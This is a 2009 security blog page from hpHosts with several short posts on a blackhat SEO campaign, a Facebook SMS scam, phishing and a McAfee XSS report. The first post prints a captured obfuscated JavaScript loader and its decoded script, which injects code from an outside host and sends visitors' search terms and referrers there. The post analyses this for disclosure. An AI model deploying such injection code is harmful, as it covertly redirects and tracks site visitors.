Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 5 May 2009

IST (Internet Service Team - *.internetserviceteam.com) in blackhat SEO campaign - again

So much has been documented on the IST over the years, that mentioning them now, just doesn't give the same sense of "wow" as it used to - we're so used to the crap they get up to now, that it just doesn't surprise us anymore.

The latest I've come across is certainly nothing new, Blackhat SEO has been going on for years, but is interesting in that the domain it points to (fi97.net) - doesn't actually seem to resolve (kinda defeats the object there guys). OpenDNS, even after refreshing the cache, is showing 3 servers returning "Did not resolve" and the other 3 returning a "SERVFAIL" error.

There's no denying that the IST are involved in this, as the IP PTR kinda gives it away. However, I do find their code a little interesting (though not as interesting as those that use obfuscation, as it takes the challenge away).

Loading the site listed in Google, in vURL shows;

*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://test-file-and-windows-defender.ff7test5.us/
Server IP: 78.159.122.252 [ 78.159.122.252.internetserviceteam.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 06 May 2009
Time: 03:01:21:01
*****************************************************************

<script language="Javascript" type="text/javascript">var ddxform=[];ddxform[0] = "http://go.live.com/item?colThkJGmjBdvXcrLlFjKNONQjkNkSEGzNLipNOSuGpNrjmnqXwkLrJNaSzGpNcpKWuNJSTGTNmlbX";ddxform[1] = "http://go.live.com/item?UTLkAVLabYLhrkzNzSEGuNVjclJNfSuGfNVlmmhkwbBglZkNaSTGkNcpkNkSJGfNbTmlPRcjaNlPAhBoUTVkuG";ddxform[2] = "http://go.live.com/item?LkFXvYTGAjEGbWchlVrnrflXmgBmkUwkKXUYFXQkmkvXQklhJGwoKTGkuGmjGngXQkcraGvjJGfNzNUhuGQogTLkpGwilThkwmQlTG";ddxform[3] = "http://go.live.com/item?qjOGQggXmpEGKnLkQkvTQrJOuPUhkGmigTLkmmGlzGvjuGVkPXFYaUmlBiceQbVmOOJNblfNpPPhOGhblY";ddxform[4] = "http://go.live.com/item?TGJOLigTVkVmQlfUBevXBgbZwmwaFkzXEPkGBtzGfGuGkGmoFTBkaGvWKTmmlTLlaGbjOGVgUXLpfGAnmkLkATGrkO";ddxform[5] = "http://go.live.com/item?fPPhuGJGuGFWlTGmPTQlkGPjpGcigTBkQmhlFNEXgPzUwlriheGbcmJOkNpMTNuP";ddxform[6] = "http://go.live.com/item?vhkGEGaGvYrhQkkGEOLoATGkOGhbvjaWPhhbgivWATwmATmlzUmevXQglZVmca";ddxform[7] = "http://go.live.com/item?ghLbJRzRaPzGQtEGpGuGpGkGEGOGmovTckpGPWATQmvTJGvjJGmgqXVpkGvnGkrkgTrrTOfPPhJGOGkGfGkG";ddxform[8] = "http://go.live.com/item?OGfGFWlThmbTaGKjOGAWATrmlTQlFNhbbPaULlwihecbrmpOTNgjkNkPqhuGEGfGzGkGpGEGqY";ddxform[9] = "http://go.live.com/item?whmkTGTOBogTLkfGrcKjkWghkGrcliBjLdgXGrVlpUceqXcggZVmraAhEGGcaRaROPTGaGpGfGJG";ddxform[10] = "http://go.live.com/item?zGzGJGEGJGhbPYpGOObWbTQmvTbNkWvPfGgjKjJGQjrdKXVrmlKNVcFPOPJjhtwjrnUXhkcrfGUjuGbW";ddxform[11] = "http://go.live.com/item?vTQmvTANaXPPKhkGAUwkbXUThdUhhvPhTGJGJGEGTGkGTGVbqYaG";ddxform[12] = "http://go.live.com/item?pOwjcnqXVkQrJGuHUjEGfNfNkPzGlUhkKXlTrdAhfGfGpGJGcvAhGv";ddxform[13] = "http://go.live.com/item?UhGjhnlXhkhrzGbjaGrnwgbXVlAVlThigXuOrjQnFXGkwrJPPhOGwj";ddxform[14] = "http://go.live.com/item?wngXVkrrOGbjEGUXmlgVbTriAXuOrjwnbXBkGrkPUhaGaGEGLoATrkzGvWPjwgPXcppGlqPTwmPXPhEGaGOGaGBkmsrsbjqWTU";ddxform[15] = "http://go.live.com/item?AZUXLmFGBbwflXTOTPFhOGpGuGOGKWLhKVhnBfAXQgBmpUQphkGbhmgXTOaIPiBlUVBkkIzRTIwbBiQmaGrlhk";ddxform[16] = "http://go.live.com/item?lVPjpNVacmQmwiPguVOVFYBbvfKdEUwgPXwmTVQcclhkuUViBaViKlGnmbUWljAWQbBkuMPZwkVhGnQi";ddxform[17] = "http://go.live.com/item?qjvZlZcefMGdUXGrBpLhGkKWljzMrhhdrpUjpMmjmnPXhkQrqjTIkRrjGngXckVrzRpIaMGkUXbYlXBkKXVkljaIuR";ddxform[18] = "http://go.live.com/item?gXQlAVATciKXuOlWBhKVmnQfbXVgVmfUQkvXvYUXhkwkUXwkTPJRpIkMLaQkKXPYFjkIpRKXclKVUTGi";ddxform[19] = "http://go.live.com/item?lXuOGehhqVPTcmQbrhVgaULaVkAXKYEPTRTIuMLkKjpIuRckLshsaRuIfNKkbiuIfRJIzVBlAVGkuIOR";ddxform[20] = "http://go.live.com/item?uIGbBiVmqkkITPqh";var pukne='';for (var i=0;i<ddxform.length;i++){var elmpr=ddxform[i];pukne=pukne+elmpr.substr(elmpr.indexOf('?')+1);}var bkuve='';for (var erden=0;erden<pukne.length;erden+=2){var kuhnr=pukne.charCodeAt(erden)-97;if(kuhnr<0)kuhnr+=58;kuhnr=kuhnr%5;var ircmu=pukne.charCodeAt(erden+1)-97;if(ircmu<0)ircmu+=58;var zbokp=kuhnr*52+ircmu;bkuve+=String.fromCharCode(zbokp);};eval(bkuve);</script>


http://vurl.mysteryfcm.co.uk/?url=602924

This decodes to;

var qkeys=['q', 'p', 'query', 'wd', 'searchfor', 'qs', 'string', 'w', 'as_q'];var ref = document.referrer; var query = ''; var parts = new Array(); parts = ref.split('?'); if (parts.length>1) { var datas = new Array(); datas = parts[1].split('&'); for (var i=0;i<datas.length;i++) { var data = new Array(); data = datas[i].split('='); for (var j=0; j<qkeys.length; j++) if (data[0] == qkeys[j]) {query = data[1]; break;}; if (query != '') break; };};query = unescape(query); query = escape(query); var d=new Date; rzz=d.getTime(); document.write("<scr"+"ipt src='http://fi97.net/jsr.php?uid=dir&group=ggl&keyword=&okw=&query="+query+"&referer="+escape(document.referrer)+"&href="+escape(location.href)+"&r="+rzz+"'><"+"/scr"+"ipt>");


At this point, I'm a little unsure as to the point of the go.live.com URL's being there, as they don't actually seem to lead to anything (meant to lead to spamvertised live.com profiles perhaps?, who knows - just leads me to http://home.live.com/?showunauth=1 at the moment, irrespective of whether I'm signed in to live.com or not).

One other site seems to be on the same IP as this, kitehotel.net, but that's failing to resolve too for some reason. It could be a problem with the NS, or it could be a problem at OpenDNS's end (unlikely since other DNS servers I've checked are showing the same thing), it is at this point, irrelevant.

/edit 04:41 06-05-2009

Added vURL Online results.

Facebook "IQ test" costs you up to $19.99 per month!

I've just found an article on Consumerist.com, that warns of a Facebook application, that surprise surprise, scams the living daylights out of you (when will people learn?).

Though no mention is made of what the application is called, or who developed it (pretty important information in my opinion), users of Facebook should be alert, and I know 99.9% of you don't read the small print that comes with this rubbish, but hopefully this will be a lesson in WHY YOU SHOULD READ IT!.

Read the article at;

http://consumerist.com/5239930/online-iq-test-is-really-a-stupid-mobile-phone-download-scam

Although Consumerist shows part of the applications terms of use, it fails to mention the short code number itself. We can slightly modify the image to deduce that the first two numbers are 25 and the last number is 2, but I'm unable to enhance the image enough (whilst keeping the quality) to determine the third and fourth number.

There's a class action (apparently) over at the following, mentioning several numbers and websites, but nothing I can see, that mentions the one Consumerist mentioned in their article;

http://classactionconnect.com/cell_phone_issues/2007/08/16/verizon-complaints/

There are also several other mentions in a few of the results using the following;

http://www.google.co.uk/search?hl=en&q=%28%22IQ+test%22+facebook+short+code+25%29&meta=

The most likely candidate at the moment however, is an MBLox customer, if an article on the Mirror's blog is anything to go by;

http://www.google.co.uk/search?hl=en&q=%28%22IQ+test%22+facebook+%22%2419.99%22+short+code+25%29&meta=

Monday, 4 May 2009

vURL Online surpasses half a million website dissections!

I am pleased to report, the vURL Online service, which went public in 2005, has passed the half a million websites mark. Though certainly nothing to write home about when compared to other online services, I think it's pretty cool.

The bad thing about running these services however, is the attraction of the bad guys. The vURL Online server has been seeing a slew of traffic recently, and though it's only a quarter of the traffic the hpHosts server see's, it's begun to cause a few problems - namely the servers resources becoming overloaded (more specifically, it's been causing the Application Pool to be forcibly shut down, causing the server to go offline).

I've just taken a look at the logs from the vURL Online service, and noticed something interesting - alot of those that are hammering the server, are listed, or related to listings, in the hpHosts blacklist, such as this bunch of jokers, and this lot and this lot - coincidence? I think not.

I'm looking into options for the servers due to their usage, as my current usage is coming exceedingly close to the limit imposed by my ISP, and I can't afford to upgrade to the higher packages. I'll post more on what I decide in due course.

In the meantime, I've become to think that perhaps a sponsor may be required to provide the hosting for the hpHosts and vURL services (the bad thing of course, is that I would require that the sponsor have no influence over hosts in the hpHosts database, and am not too hot on the idea of advertising being plastered all over the sites - something most sponsors usually require if I'm not mistaken?). I've absolutely no idea on how one goes about enquiring about such, so I'd love to hear your thoughts?

Please give me your password (aka how gullible are you?)

Interestingly, I've just been sent a phishing pack by a friend that found it on one of the many hacker forums, and surprise surprise, Facebook is included within it (shown left).

Bill's article is actually showing a huge problem with 90% of users on the internet - most WILL give out their login credentials when asked, will NOT look at who they're giving them to and DO use the same credentials for multiple websites (banks included!). This has been known for years, and many have tried to persuade users to both be more cautious, and use different passwords for different sites, yet few have taken notice as this is thought to be "too difficult". Sigh.

This week many of my friends on Facebook reported getting stung by yet another hacker trick to get someones name and password. Many received an Email with a message about something new on Facebook and received a link which appeared as it if was Facebook. Surprise, surprise it turned out to be a completely different website that just looked like the Facebook login page.

Simple tricks like this remain the most common distribution methods of deceptive programs and ID theft on the Internet. Once someone has your name and password, they have access to your valuable contact list. Your unsuspecting friends will start to recieve similar invitations and even downloadable files with every possible kind of malware. Many of your contacts will trust an attachment because they think it comes from somone they know.


Read more
http://billpstudios.blogspot.com/2009/05/please-enter-your-name-and-password.html

McAfee Secure (aka "hacker safe") called into question as McAfee's OWN SITE is compromised via XSS to allow malware distribution and fraud

McAfee are experiencing a whole host of problems lately, the most recent of which, calls into question their McAfee Secure program, that scans sites participating in the program, for vulnerabilities that would allow a hacker to exploit it.

The reason this has been called into question? McAfee's own website has been found to be vulnerable to an XSS attack - how can they be trusted to validate another site if they can't even secure their own?

Read more on this issue over at ReadWriteWeb;

http://www.readwriteweb.com/archives/mcafee_enabling_malware_distribution_and_fraud.php

Kudos to Suzi at Spyware Warrior for the heads up.